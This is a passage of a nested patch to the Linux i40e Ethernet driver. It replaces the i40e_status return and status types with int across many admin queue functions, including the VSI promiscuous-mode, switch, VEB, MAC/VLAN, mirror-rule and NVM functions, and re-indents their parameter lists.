++int i40e_aq_set_default_vsi(struct i40e_hw *hw,
++			    u16 seid,
++			    struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -1951,15 +1805,15 @@ i40e_status i40e_aq_set_default_vsi(struct i40e_hw *hw,
+  * @seid: vsi number
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_clear_default_vsi(struct i40e_hw *hw,
+-				      u16 seid,
+-				      struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_clear_default_vsi(struct i40e_hw *hw,
++			      u16 seid,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -1981,16 +1835,16 @@ i40e_status i40e_aq_clear_default_vsi(struct i40e_hw *hw,
+  * @cmd_details: pointer to command details structure or NULL
+  * @rx_only_promisc: flag to decide if egress traffic gets mirrored in promisc
+  **/
+-i40e_status i40e_aq_set_vsi_unicast_promiscuous(struct i40e_hw *hw,
+-				u16 seid, bool set,
+-				struct i40e_asq_cmd_details *cmd_details,
+-				bool rx_only_promisc)
++int i40e_aq_set_vsi_unicast_promiscuous(struct i40e_hw *hw,
++					u16 seid, bool set,
++					struct i40e_asq_cmd_details *cmd_details,
++					bool rx_only_promisc)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2021,14 +1875,15 @@ i40e_status i40e_aq_set_vsi_unicast_promiscuous(struct i40e_hw *hw,
+  * @set: set multicast promiscuous enable/disable
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_set_vsi_multicast_promiscuous(struct i40e_hw *hw,
+-				u16 seid, bool set, struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_vsi_multicast_promiscuous(struct i40e_hw *hw,
++					  u16 seid, bool set,
++					  struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2054,16 +1909,16 @@ i40e_status i40e_aq_set_vsi_multicast_promiscuous(struct i40e_hw *hw,
+  * @vid: The VLAN tag filter - capture any multicast packet with this VLAN tag
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-enum i40e_status_code i40e_aq_set_vsi_mc_promisc_on_vlan(struct i40e_hw *hw,
+-							 u16 seid, bool enable,
+-							 u16 vid,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_vsi_mc_promisc_on_vlan(struct i40e_hw *hw,
++				       u16 seid, bool enable,
++				       u16 vid,
++				       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	enum i40e_status_code status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2090,16 +1945,16 @@ enum i40e_status_code i40e_aq_set_vsi_mc_promisc_on_vlan(struct i40e_hw *hw,
+  * @vid: The VLAN tag filter - capture any unicast packet with this VLAN tag
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-enum i40e_status_code i40e_aq_set_vsi_uc_promisc_on_vlan(struct i40e_hw *hw,
+-							 u16 seid, bool enable,
+-							 u16 vid,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_vsi_uc_promisc_on_vlan(struct i40e_hw *hw,
++				       u16 seid, bool enable,
++				       u16 vid,
++				       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	enum i40e_status_code status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2132,15 +1987,15 @@ enum i40e_status_code i40e_aq_set_vsi_uc_promisc_on_vlan(struct i40e_hw *hw,
+  * @vid: The VLAN tag filter - capture any broadcast packet with this VLAN tag
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_set_vsi_bc_promisc_on_vlan(struct i40e_hw *hw,
+-				u16 seid, bool enable, u16 vid,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_vsi_bc_promisc_on_vlan(struct i40e_hw *hw,
++				       u16 seid, bool enable, u16 vid,
++				       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2167,14 +2022,14 @@ i40e_status i40e_aq_set_vsi_bc_promisc_on_vlan(struct i40e_hw *hw,
+  *
+  * Set or clear the broadcast promiscuous flag (filter) for a given VSI.
+  **/
+-i40e_status i40e_aq_set_vsi_broadcast(struct i40e_hw *hw,
+-				u16 seid, bool set_filter,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_vsi_broadcast(struct i40e_hw *hw,
++			      u16 seid, bool set_filter,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2200,15 +2055,15 @@ i40e_status i40e_aq_set_vsi_broadcast(struct i40e_hw *hw,
+  * @enable: set MAC L2 layer unicast promiscuous enable/disable for a given VLAN
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_set_vsi_vlan_promisc(struct i40e_hw *hw,
+-				       u16 seid, bool enable,
+-				       struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_vsi_vlan_promisc(struct i40e_hw *hw,
++				 u16 seid, bool enable,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2230,9 +2085,9 @@ i40e_status i40e_aq_set_vsi_vlan_promisc(struct i40e_hw *hw,
+  * @vsi_ctx: pointer to a vsi context struct
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_get_vsi_params(struct i40e_hw *hw,
+-				struct i40e_vsi_context *vsi_ctx,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_vsi_params(struct i40e_hw *hw,
++			   struct i40e_vsi_context *vsi_ctx,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_get_update_vsi *cmd =
+@@ -2240,7 +2095,7 @@ i40e_status i40e_aq_get_vsi_params(struct i40e_hw *hw,
+ 	struct i40e_aqc_add_get_update_vsi_completion *resp =
+ 		(struct i40e_aqc_add_get_update_vsi_completion *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_get_vsi_parameters);
+@@ -2272,9 +2127,9 @@ aq_get_vsi_params_exit:
+  *
+  * Update a VSI context.
+  **/
+-i40e_status i40e_aq_update_vsi_params(struct i40e_hw *hw,
+-				struct i40e_vsi_context *vsi_ctx,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_update_vsi_params(struct i40e_hw *hw,
++			      struct i40e_vsi_context *vsi_ctx,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_get_update_vsi *cmd =
+@@ -2282,7 +2137,7 @@ i40e_status i40e_aq_update_vsi_params(struct i40e_hw *hw,
+ 	struct i40e_aqc_add_get_update_vsi_completion *resp =
+ 		(struct i40e_aqc_add_get_update_vsi_completion *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_update_vsi_parameters);
+@@ -2310,15 +2165,15 @@ i40e_status i40e_aq_update_vsi_params(struct i40e_hw *hw,
+  *
+  * Fill the buf with switch configuration returned from AdminQ command
+  **/
+-i40e_status i40e_aq_get_switch_config(struct i40e_hw *hw,
+-				struct i40e_aqc_get_switch_config_resp *buf,
+-				u16 buf_size, u16 *start_seid,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_switch_config(struct i40e_hw *hw,
++			      struct i40e_aqc_get_switch_config_resp *buf,
++			      u16 buf_size, u16 *start_seid,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_switch_seid *scfg =
+ 		(struct i40e_aqc_switch_seid *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_get_switch_config);
+@@ -2344,15 +2199,15 @@ i40e_status i40e_aq_get_switch_config(struct i40e_hw *hw,
+  *
+  * Set switch configuration bits
+  **/
+-enum i40e_status_code i40e_aq_set_switch_config(struct i40e_hw *hw,
+-						u16 flags,
+-						u16 valid_flags, u8 mode,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_switch_config(struct i40e_hw *hw,
++			      u16 flags,
++			      u16 valid_flags, u8 mode,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_switch_config *scfg =
+ 		(struct i40e_aqc_set_switch_config *)&desc.params.raw;
+-	enum i40e_status_code status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_switch_config);
+@@ -2381,16 +2236,16 @@ enum i40e_status_code i40e_aq_set_switch_config(struct i40e_hw *hw,
+  *
+  * Get the firmware version from the admin queue commands
+  **/
+-i40e_status i40e_aq_get_firmware_version(struct i40e_hw *hw,
+-				u16 *fw_major_version, u16 *fw_minor_version,
+-				u32 *fw_build,
+-				u16 *api_major_version, u16 *api_minor_version,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_firmware_version(struct i40e_hw *hw,
++				 u16 *fw_major_version, u16 *fw_minor_version,
++				 u32 *fw_build,
++				 u16 *api_major_version, u16 *api_minor_version,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_get_version *resp =
+ 		(struct i40e_aqc_get_version *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_get_version);
+ 
+@@ -2420,14 +2275,14 @@ i40e_status i40e_aq_get_firmware_version(struct i40e_hw *hw,
+  *
+  * Send the driver version to the firmware
+  **/
+-i40e_status i40e_aq_send_driver_version(struct i40e_hw *hw,
++int i40e_aq_send_driver_version(struct i40e_hw *hw,
+ 				struct i40e_driver_version *dv,
+ 				struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_driver_version *cmd =
+ 		(struct i40e_aqc_driver_version *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 	u16 len;
+ 
+ 	if (dv == NULL)
+@@ -2462,9 +2317,9 @@ i40e_status i40e_aq_send_driver_version(struct i40e_hw *hw,
+  *
+  * Side effect: LinkStatusEvent reporting becomes enabled
+  **/
+-i40e_status i40e_get_link_status(struct i40e_hw *hw, bool *link_up)
++int i40e_get_link_status(struct i40e_hw *hw, bool *link_up)
+ {
+-	i40e_status status = 0;
++	int status = 0;
+ 
+ 	if (hw->phy.get_link_info) {
+ 		status = i40e_update_link_info(hw);
+@@ -2483,10 +2338,10 @@ i40e_status i40e_get_link_status(struct i40e_hw *hw, bool *link_up)
+  * i40e_update_link_info - update status of the HW network link
+  * @hw: pointer to the hw struct
+  **/
+-noinline_for_stack i40e_status i40e_update_link_info(struct i40e_hw *hw)
++noinline_for_stack int i40e_update_link_info(struct i40e_hw *hw)
+ {
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+-	i40e_status status = 0;
++	int status = 0;
+ 
+ 	status = i40e_aq_get_link_info(hw, true, NULL, NULL);
+ 	if (status)
+@@ -2533,19 +2388,19 @@ noinline_for_stack i40e_status i40e_update_link_info(struct i40e_hw *hw)
+  * This asks the FW to add a VEB between the uplink and downlink
+  * elements.  If the uplink SEID is 0, this will be a floating VEB.
+  **/
+-i40e_status i40e_aq_add_veb(struct i40e_hw *hw, u16 uplink_seid,
+-				u16 downlink_seid, u8 enabled_tc,
+-				bool default_port, u16 *veb_seid,
+-				bool enable_stats,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_add_veb(struct i40e_hw *hw, u16 uplink_seid,
++		    u16 downlink_seid, u8 enabled_tc,
++		    bool default_port, u16 *veb_seid,
++		    bool enable_stats,
++		    struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_veb *cmd =
+ 		(struct i40e_aqc_add_veb *)&desc.params.raw;
+ 	struct i40e_aqc_add_veb_completion *resp =
+ 		(struct i40e_aqc_add_veb_completion *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 veb_flags = 0;
++	int status;
+ 
+ 	/* SEIDs need to either both be set or both be 0 for floating VEB */
+ 	if (!!uplink_seid != !!downlink_seid)
+@@ -2591,17 +2446,17 @@ i40e_status i40e_aq_add_veb(struct i40e_hw *hw, u16 uplink_seid,
+  * This retrieves the parameters for a particular VEB, specified by
+  * uplink_seid, and returns them to the caller.
+  **/
+-i40e_status i40e_aq_get_veb_parameters(struct i40e_hw *hw,
+-				u16 veb_seid, u16 *switch_id,
+-				bool *floating, u16 *statistic_index,
+-				u16 *vebs_used, u16 *vebs_free,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_veb_parameters(struct i40e_hw *hw,
++			       u16 veb_seid, u16 *switch_id,
++			       bool *floating, u16 *statistic_index,
++			       u16 *vebs_used, u16 *vebs_free,
++			       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_get_veb_parameters_completion *cmd_resp =
+ 		(struct i40e_aqc_get_veb_parameters_completion *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (veb_seid == 0)
+ 		return I40E_ERR_PARAM;
+@@ -2685,7 +2540,7 @@ i40e_prepare_add_macvlan(struct i40e_aqc_add_macvlan_element_data *mv_list,
+  *
+  * Add MAC/VLAN addresses to the HW filtering
+  **/
+-i40e_status
++int
+ i40e_aq_add_macvlan(struct i40e_hw *hw, u16 seid,
+ 		    struct i40e_aqc_add_macvlan_element_data *mv_list,
+ 		    u16 count, struct i40e_asq_cmd_details *cmd_details)
+@@ -2717,7 +2572,7 @@ i40e_aq_add_macvlan(struct i40e_hw *hw, u16 seid,
+  * It also calls _v2 versions of asq_send_command functions to
+  * get the aq_status on the stack.
+  **/
+-i40e_status
++int
+ i40e_aq_add_macvlan_v2(struct i40e_hw *hw, u16 seid,
+ 		       struct i40e_aqc_add_macvlan_element_data *mv_list,
+ 		       u16 count, struct i40e_asq_cmd_details *cmd_details,
+@@ -2745,15 +2600,16 @@ i40e_aq_add_macvlan_v2(struct i40e_hw *hw, u16 seid,
+  *
+  * Remove MAC/VLAN addresses from the HW filtering
+  **/
+-i40e_status i40e_aq_remove_macvlan(struct i40e_hw *hw, u16 seid,
+-			struct i40e_aqc_remove_macvlan_element_data *mv_list,
+-			u16 count, struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_remove_macvlan(struct i40e_hw *hw, u16 seid,
++		       struct i40e_aqc_remove_macvlan_element_data *mv_list,
++		       u16 count, struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_macvlan *cmd =
+ 		(struct i40e_aqc_macvlan *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 buf_size;
++	int status;
+ 
+ 	if (count == 0 || !mv_list || !hw)
+ 		return I40E_ERR_PARAM;
+@@ -2792,7 +2648,7 @@ i40e_status i40e_aq_remove_macvlan(struct i40e_hw *hw, u16 seid,
+  * It also calls _v2 versions of asq_send_command functions to
+  * get the aq_status on the stack.
+  **/
+-i40e_status
++int
+ i40e_aq_remove_macvlan_v2(struct i40e_hw *hw, u16 seid,
+ 			  struct i40e_aqc_remove_macvlan_element_data *mv_list,
+ 			  u16 count, struct i40e_asq_cmd_details *cmd_details,
+@@ -2840,19 +2696,19 @@ i40e_aq_remove_macvlan_v2(struct i40e_hw *hw, u16 seid,
+  * Add/Delete a mirror rule to a specific switch. Mirror rules are supported for
+  * VEBs/VEPA elements only
+  **/
+-static i40e_status i40e_mirrorrule_op(struct i40e_hw *hw,
+-				u16 opcode, u16 sw_seid, u16 rule_type, u16 id,
+-				u16 count, __le16 *mr_list,
+-				struct i40e_asq_cmd_details *cmd_details,
+-				u16 *rule_id, u16 *rules_used, u16 *rules_free)
++static int i40e_mirrorrule_op(struct i40e_hw *hw,
++			      u16 opcode, u16 sw_seid, u16 rule_type, u16 id,
++			      u16 count, __le16 *mr_list,
++			      struct i40e_asq_cmd_details *cmd_details,
++			      u16 *rule_id, u16 *rules_used, u16 *rules_free)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_delete_mirror_rule *cmd =
+ 		(struct i40e_aqc_add_delete_mirror_rule *)&desc.params.raw;
+ 	struct i40e_aqc_add_delete_mirror_rule_completion *resp =
+ 	(struct i40e_aqc_add_delete_mirror_rule_completion *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 buf_size;
++	int status;
+ 
+ 	buf_size = count * sizeof(*mr_list);
+ 
+@@ -2900,10 +2756,11 @@ static i40e_status i40e_mirrorrule_op(struct i40e_hw *hw,
+  *
+  * Add mirror rule. Mirror rules are supported for VEBs or VEPA elements only
+  **/
+-i40e_status i40e_aq_add_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
+-			u16 rule_type, u16 dest_vsi, u16 count, __le16 *mr_list,
+-			struct i40e_asq_cmd_details *cmd_details,
+-			u16 *rule_id, u16 *rules_used, u16 *rules_free)
++int i40e_aq_add_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
++			   u16 rule_type, u16 dest_vsi, u16 count,
++			   __le16 *mr_list,
++			   struct i40e_asq_cmd_details *cmd_details,
++			   u16 *rule_id, u16 *rules_used, u16 *rules_free)
+ {
+ 	if (!(rule_type == I40E_AQC_MIRROR_RULE_TYPE_ALL_INGRESS ||
+ 	    rule_type == I40E_AQC_MIRROR_RULE_TYPE_ALL_EGRESS)) {
+@@ -2931,10 +2788,11 @@ i40e_status i40e_aq_add_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
+  *
+  * Delete a mirror rule. Mirror rules are supported for VEBs/VEPA elements only
+  **/
+-i40e_status i40e_aq_delete_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
+-			u16 rule_type, u16 rule_id, u16 count, __le16 *mr_list,
+-			struct i40e_asq_cmd_details *cmd_details,
+-			u16 *rules_used, u16 *rules_free)
++int i40e_aq_delete_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
++			      u16 rule_type, u16 rule_id, u16 count,
++			      __le16 *mr_list,
++			      struct i40e_asq_cmd_details *cmd_details,
++			      u16 *rules_used, u16 *rules_free)
+ {
+ 	/* Rule ID has to be valid except rule_type: INGRESS VLAN mirroring */
+ 	if (rule_type == I40E_AQC_MIRROR_RULE_TYPE_VLAN) {
+@@ -2963,14 +2821,14 @@ i40e_status i40e_aq_delete_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
+  *
+  * send msg to vf
+  **/
+-i40e_status i40e_aq_send_msg_to_vf(struct i40e_hw *hw, u16 vfid,
+-				u32 v_opcode, u32 v_retval, u8 *msg, u16 msglen,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_send_msg_to_vf(struct i40e_hw *hw, u16 vfid,
++			   u32 v_opcode, u32 v_retval, u8 *msg, u16 msglen,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_pf_vf_message *cmd =
+ 		(struct i40e_aqc_pf_vf_message *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_send_msg_to_vf);
+ 	cmd->id = cpu_to_le32(vfid);
+@@ -2998,14 +2856,14 @@ i40e_status i40e_aq_send_msg_to_vf(struct i40e_hw *hw, u16 vfid,
+  *
+  * Read the register using the admin queue commands
+  **/
+-i40e_status i40e_aq_debug_read_register(struct i40e_hw *hw,
++int i40e_aq_debug_read_register(struct i40e_hw *hw,
+ 				u32 reg_addr, u64 *reg_val,
+ 				struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_debug_reg_read_write *cmd_resp =
+ 		(struct i40e_aqc_debug_reg_read_write *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (reg_val == NULL)
+ 		return I40E_ERR_PARAM;
+@@ -3033,14 +2891,14 @@ i40e_status i40e_aq_debug_read_register(struct i40e_hw *hw,
+  *
+  * Write to a register using the admin queue commands
+  **/
+-i40e_status i40e_aq_debug_write_register(struct i40e_hw *hw,
+-					u32 reg_addr, u64 reg_val,
+-					struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_debug_write_register(struct i40e_hw *hw,
++				 u32 reg_addr, u64 reg_val,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_debug_reg_read_write *cmd =
+ 		(struct i40e_aqc_debug_reg_read_write *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_debug_write_reg);
+ 
+@@ -3064,16 +2922,16 @@ i40e_status i40e_aq_debug_write_register(struct i40e_hw *hw,
+  *
+  * requests common resource using the admin queue commands
+  **/
+-i40e_status i40e_aq_request_resource(struct i40e_hw *hw,
+-				enum i40e_aq_resources_ids resource,
+-				enum i40e_aq_resource_access_type access,
+-				u8 sdp_number, u64 *timeout,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_request_resource(struct i40e_hw *hw,
++			     enum i40e_aq_resources_ids resource,
++			     enum i40e_aq_resource_access_type access,
++			     u8 sdp_number, u64 *timeout,
++			     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_request_resource *cmd_resp =
+ 		(struct i40e_aqc_request_resource *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_request_resource);
+ 
+@@ -3103,15 +2961,15 @@ i40e_status i40e_aq_request_resource(struct i40e_hw *hw,
+  *
+  * release common resource using the admin queue commands
+  **/
+-i40e_status i40e_aq_release_resource(struct i40e_hw *hw,
+-				enum i40e_aq_resources_ids resource,
+-				u8 sdp_number,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_release_resource(struct i40e_hw *hw,
++			     enum i40e_aq_resources_ids resource,
++			     u8 sdp_number,
++			     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_request_resource *cmd =
+ 		(struct i40e_aqc_request_resource *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_release_resource);
+ 
+@@ -3135,15 +2993,15 @@ i40e_status i40e_aq_release_resource(struct i40e_hw *hw,
+  *
+  * Read the NVM using the admin queue commands
+  **/
+-i40e_status i40e_aq_read_nvm(struct i40e_hw *hw, u8 module_pointer,
+-				u32 offset, u16 length, void *data,
+-				bool last_command,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_read_nvm(struct i40e_hw *hw, u8 module_pointer,
++		     u32 offset, u16 length, void *data,
++		     bool last_command,
++		     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_nvm_update *cmd =
+ 		(struct i40e_aqc_nvm_update *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	/* In offset the highest byte must be zeroed. */
+ 	if (offset & 0xFF000000) {
+@@ -3181,14 +3039,14 @@ i40e_aq_read_nvm_exit:
+  *
+  * Erase the NVM sector using the admin queue commands
+  **/
+-i40e_status i40e_aq_erase_nvm(struct i40e_hw *hw, u8 module_pointer,
+-			      u32 offset, u16 length, bool last_command,
+-			      struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_erase_nvm(struct i40e_hw *hw, u8 module_pointer,
++		      u32 offset, u16 length, bool last_command,
++		      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_nvm_update *cmd =
+ 		(struct i40e_aqc_nvm_update *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	/* In offset the highest byte must be zeroed. */
+ 	if (offset & 0xFF000000) {
+@@ -3229,8 +3087,8 @@ static void i40e_parse_discover_capabilities(struct i40e_hw *hw, void *buff,
+ 	u32 number, logical_id, phys_id;
+ 	struct i40e_hw_capabilities *p;
+ 	u16 id, ocp_cfg_word0;
+-	i40e_status status;
+ 	u8 major_rev;
++	int status;
+ 	u32 i = 0;
+ 
+ 	cap = (struct i40e_aqc_list_capabilities_element_resp *) buff;
+@@ -3471,14 +3329,14 @@ static void i40e_parse_discover_capabilities(struct i40e_hw *hw, void *buff,
+  *
+  * Get the device capabilities descriptions from the firmware
+  **/
+-i40e_status i40e_aq_discover_capabilities(struct i40e_hw *hw,
+-				void *buff, u16 buff_size, u16 *data_size,
+-				enum i40e_admin_queue_opc list_type_opc,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_discover_capabilities(struct i40e_hw *hw,
++				  void *buff, u16 buff_size, u16 *data_size,
++				  enum i40e_admin_queue_opc list_type_opc,
++				  struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aqc_list_capabilites *cmd;
+ 	struct i40e_aq_desc desc;
+-	i40e_status status = 0;
++	int status = 0;
+ 
+ 	cmd = (struct i40e_aqc_list_capabilites *)&desc.params.raw;
+ 
+@@ -3520,15 +3378,15 @@ exit:
+  *
+  * Update the NVM using the admin queue commands
+  **/
+-i40e_status i40e_aq_update_nvm(struct i40e_hw *hw, u8 module_pointer,
+-			       u32 offset, u16 length, void *data,
+-				bool last_command, u8 preservation_flags,
+-			       struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_update_nvm(struct i40e_hw *hw, u8 module_pointer,
++		       u32 offset, u16 length, void *data,
++		       bool last_command, u8 preservation_flags,
++		       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_nvm_update *cmd =
+ 		(struct i40e_aqc_nvm_update *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	/* In offset the highest byte must be zeroed. */
+ 	if (offset & 0xFF000000) {
+@@ -3573,13 +3431,13 @@ i40e_aq_update_nvm_exit:
+  *
+  * Rearrange NVM structure, available only for transition FW
+  **/
+-i40e_status i40e_aq_rearrange_nvm(struct i40e_hw *hw,
+-				  u8 rearrange_nvm,
+-				  struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_rearrange_nvm(struct i40e_hw *hw,
++			  u8 rearrange_nvm,
++			  struct i40e_asq_cmd_details *cmd_details)
+ {
